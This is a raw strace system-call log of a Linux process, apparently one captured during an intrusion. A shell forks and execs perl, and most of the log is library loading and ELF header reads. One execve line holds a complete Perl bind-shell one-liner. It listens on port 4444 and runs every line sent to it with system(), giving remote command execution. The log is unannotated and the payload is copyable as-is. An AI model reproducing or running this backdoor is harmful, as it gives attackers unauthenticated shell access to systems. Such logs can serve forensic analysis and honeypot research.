7828  07:20:33.630648 open("/etc/ld.so.cache", O_RDONLY) = 1

7828  07:20:33.630661 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7828  07:20:33.630678 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbc000

7828  07:20:33.630702 close(1)          = 0

7828  07:20:33.630712 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.630727 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7828  07:20:33.630741 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7828  07:20:33.630830 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7828  07:20:33.630847 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0c000

7828  07:20:33.630858 mmap2(0xb7e14000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7e14000

7828  07:20:33.630875 close(1)          = 0

7828  07:20:33.630887 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7828  07:20:33.630900 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7828  07:20:33.630914 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7828  07:20:33.631015 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7828  07:20:33.631033 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e01000

7828  07:20:33.631045 mmap2(0xb7e0a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e0a000

7828  07:20:33.631061 close(1)          = 0

7828  07:20:33.631082 munmap(0xb7fbc000, 29913) = 0

7828  07:20:33.631097 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7828  07:20:33.631112 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7828  07:20:33.631124 _llseek(1, 0, [0], SEEK_CUR) = 0

7828  07:20:33.631135 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7828  07:20:33.631151 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fc3000

7828  07:20:33.631162 _llseek(1, 1624, [1624], SEEK_SET) = 0

7828  07:20:33.631177 munmap(0xb7fc3000, 1624) = 0

7828  07:20:33.631187 close(1)          = 0

7828  07:20:33.631216 getpgrp()         = 3831

7828  07:20:33.631226 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7828  07:20:33.631242 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7828  07:20:33.631258 brk(0x8101000)    = 0x8101000

7828  07:20:33.631290 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7828  07:20:33.631304 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7828  07:20:33.631319 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7828  07:20:33.631356 brk(0x8102000)    = 0x8102000

7828  07:20:33.631382 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7828  07:20:33.631400 stat64("/sbin/AB", 0xbf85c6b8) = -1 ENOENT (No such file or directory)

7828  07:20:33.631413 stat64("/bin/AB", 0xbf85c6b8) = -1 ENOENT (No such file or directory)

7828  07:20:33.631424 stat64("/usr/sbin/AB", 0xbf85c6b8) = -1 ENOENT (No such file or directory)

7828  07:20:33.631435 stat64("/usr/bin/AB", 0xbf85c6b8) = -1 ENOENT (No such file or directory)

7828  07:20:33.631448 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7828  07:20:33.631463 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e376f8) = 7829

7829  07:20:33.631528 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7829  07:20:33.631545 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7829  07:20:33.631558 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7829  07:20:33.631570 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7829  07:20:33.631585 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7829  07:20:33.631601 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7829  07:20:33.631613 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7829  07:20:33.631669 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7829  07:20:33.631683 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7829  07:20:33.631755 exit_group(127)   = ?

7828  07:20:33.667152 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:20:33.667179 waitpid(7828,  <unfinished ...>

7828  07:20:33.667200 <... rt_sigprocmask resumed> NULL, 8) = 0

7828  07:20:33.667208 --- SIGCHLD (Child exited) @ 0 (0) ---

7828  07:20:33.667223 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7829

7828  07:20:33.667240 waitpid(-1, 0xbf85c338, WNOHANG) = -1 ECHILD (No child processes)

7828  07:20:33.667251 sigreturn()       = ? (mask now [])

7828  07:20:33.667275 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7828  07:20:33.667292 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7828  07:20:33.667303 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7828  07:20:33.667322 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7828  07:20:33.667341 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7828  07:20:33.667353 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7828  07:20:33.667389 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7828  07:20:33.667409 stat64("/sbin/perl", 0xbf85c6e8) = -1 ENOENT (No such file or directory)

7828  07:20:33.667422 stat64("/bin/perl", 0xbf85c6e8) = -1 ENOENT (No such file or directory)

7828  07:20:33.667433 stat64("/usr/sbin/perl", 0xbf85c6e8) = -1 ENOENT (No such file or directory)

7828  07:20:33.667445 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7828  07:20:33.667463 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7828  07:20:33.667488 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7828  07:20:33.667503 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e376f8) = 7830

7830  07:20:33.667553 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7830  07:20:33.667621 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7830  07:20:33.667653 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7830  07:20:33.667665 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7830  07:20:33.667680 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7830  07:20:33.667696 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7830  07:20:33.667709 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7830  07:20:33.667744 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7830  07:20:33.667835 brk(0)            = 0x8153000

7830  07:20:33.667856 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7830  07:20:33.667872 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f8c000

7830  07:20:33.667887 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7830  07:20:33.667905 open("/etc/ld.so.cache", O_RDONLY) = 1

7830  07:20:33.667917 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7830  07:20:33.667934 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f84000

7830  07:20:33.667944 close(1)          = 0

7830  07:20:33.667955 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7830  07:20:33.667970 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7830  07:20:33.667984 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7830  07:20:33.668124 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7830  07:20:33.668142 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f80000

7830  07:20:33.668155 mmap2(0xb7f82000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f82000

7830  07:20:33.668175 close(1)          = 0

7830  07:20:33.668186 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7830  07:20:33.668200 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7830  07:20:33.668214 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7830  07:20:33.668302 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7830  07:20:33.668319 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5b000

7830  07:20:33.668330 mmap2(0xb7f7e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f7e000

7830  07:20:33.668346 close(1)          = 0

7830  07:20:33.668358 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7830  07:20:33.668371 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7830  07:20:33.668385 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7830  07:20:33.668471 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7830  07:20:33.668487 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f5a000

7830  07:20:33.668500 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f42000

7830  07:20:33.668511 mmap2(0xb7f56000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f56000

7830  07:20:33.668525 mmap2(0xb7f58000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f58000

7830  07:20:33.668539 close(1)          = 0

7830  07:20:33.668550 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7830  07:20:33.668570 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7830  07:20:33.668585 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7830  07:20:33.668677 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7830  07:20:33.668695 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df3000

7830  07:20:33.668706 mmap2(0xb7f3c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f3c000

7830  07:20:33.668721 mmap2(0xb7f3f000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f3f000

7830  07:20:33.668734 close(1)          = 0

7830  07:20:33.668746 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7830  07:20:33.668759 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7830  07:20:33.668773 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7830  07:20:33.668863 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7830  07:20:33.668880 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc1000

7830  07:20:33.668891 mmap2(0xb7dca000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dca000

7830  07:20:33.668904 mmap2(0xb7dcc000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dcc000

7830  07:20:33.668918 close(1)          = 0

7830  07:20:33.668941 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dc0000

7830  07:20:33.668954 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dc08c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7830  07:20:33.669017 mprotect(0xb7f3c000, 4096, PROT_READ) = 0

7830  07:20:33.669044 munmap(0xb7f84000, 29913) = 0

7830  07:20:33.669052 set_tid_address(0xb7dc0908) = 7830

7830  07:20:33.669053 set_robust_list(0xb7dc0910, 0xc) = 0

7830  07:20:33.669053 futex(0xbfdd1270, 0x81 /* FUTEX_??? */, 1) = 0

7830  07:20:33.669053 rt_sigaction(SIGRTMIN, {0xb7f462c0, [], SA_SIGINFO}, NULL, 8) = 0

7830  07:20:33.669053 rt_sigaction(SIGRT_1, {0xb7f46340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

7830  07:20:33.669053 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

7830  07:20:33.669054 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

